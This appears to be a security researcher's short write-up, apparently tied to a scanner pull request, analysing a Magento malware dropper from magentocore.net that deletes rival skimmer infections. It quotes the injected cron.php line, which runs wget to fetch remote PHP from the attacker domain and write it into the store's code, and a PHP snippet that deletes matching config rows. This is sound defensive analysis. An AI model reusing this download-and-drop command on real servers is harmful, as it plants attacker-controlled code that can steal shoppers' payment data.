Malware killing malware

[gwillem]

This blog describes a malware dropper from magentocore.net. The latter is a well known burner domain (already in our archive) but apparently the dropper looks for several other malware to kill.

The dropper adds this to cron.php:

shell_exec ("wget ​​-c https://magentocore.net/clear.json -O ./app/code/core/clear.php 2>&1");

Then, clear.json is actually PHP and contains:

$signaturez = array('%ATMZOW%','%19303817.js%','%PZ7SKD%');
foreach ($signaturez as $sing) {
        mysqli_query($link, "delete from " . $db_prefix . "core_config_data where value like '$sing'");

So it will remove previous malware infections (those are often in the "design" config directives). ATMZOW and PZ7SKD seem to refer to the same type of obfuscation, which includes a payment skimmer that sends to vamberlo.com. In this PR, I have included a signature that will cover them both.

The 19303817.js is curious. Publicwww has found one instance on goodsneaker.club (not live anymore). There, it is part of this url: http://js.users.51.la/19303817.js. The domain 51.la appears to be a Chinese clone of Google Analytics. Curiously, there are several thousand Magento stores that include this analytics in the <address> tag. This looks fishy. Also, those 51.la links are flagged as malware by many virus scanners. But I haven't established the business case behind this abuse yet. Any ideas? I have not included 51.la in the scanner yet, because it is used by Chinese stores as well (where it is supposedly legitimate).